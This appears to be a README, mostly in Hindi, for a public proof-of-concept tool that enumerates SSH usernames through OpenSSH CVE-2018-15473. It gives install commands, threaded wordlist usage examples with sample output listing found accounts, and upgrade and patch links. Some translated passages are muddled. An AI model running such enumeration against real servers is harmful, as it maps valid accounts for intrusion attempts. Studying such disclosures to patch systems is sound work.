
OpenSSH CVE-2018-15473 के लिए प्रूफ-ऑफ-कॉन्सेप्ट SSH उपयोगकर्ता नाम गणना एक्सप्लॉइट। थ्रेडिंग, वर्डलिस्ट, IPv6 और कमजोर सर्वरों पर मान्य खातों का पता लगाने का समर्थन करता है।
OpenSSH सर्वर, अनुरोध वाले पैकेट को पूरी तरह से पार्स करने से पहले, एक अमान्य उपयोगकर्ता के प्रमाणीकरण को संसाधित करने में देरी नहीं करता है। यह भेद्यता auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c से संबंधित है।
हालांकि इस भेद्यता का उपयोग मान्य उपयोगकर्ता नामों की सूची उत्पन्न करने के लिए नहीं किया जा सकता है, फिर भी इसका उपयोग उपयोगकर्ता नामों का अनुमान लगाने के लिए किया जा सकता है।
OpenSSH <= 7.7
openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27
आपको संभवतः अपने वितरण के समतुल्य openssl-dev पैकेज स्थापित करने की आवश्यकता हो सकती है।
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt
# 或者使用以下命令下载安装
pipenv install -r requirements.txt # if you're cool like that
chmod u+x ssh-username-enum.py
उदाहरण 1: एकल उपयोगकर्ता गणना
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!
उदाहरण 2: 10 थ्रेड्स के साथ एकाधिक उपयोगकर्ता गणना (डिफ़ॉल्ट थ्रेड 4 है)
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
आदि
उदाहरण 3: IPV6 पता और SSH पोर्ट नंबर निर्दिष्ट करना
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
आदि
उपयोगकर्ताओं को अप्रभावित संस्करण में अपग्रेड करने की सलाह दी जाती है। OpenBSD परियोजना ने निम्नलिखित लिंक पर स्रोत कोड फिक्स जारी किया है: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/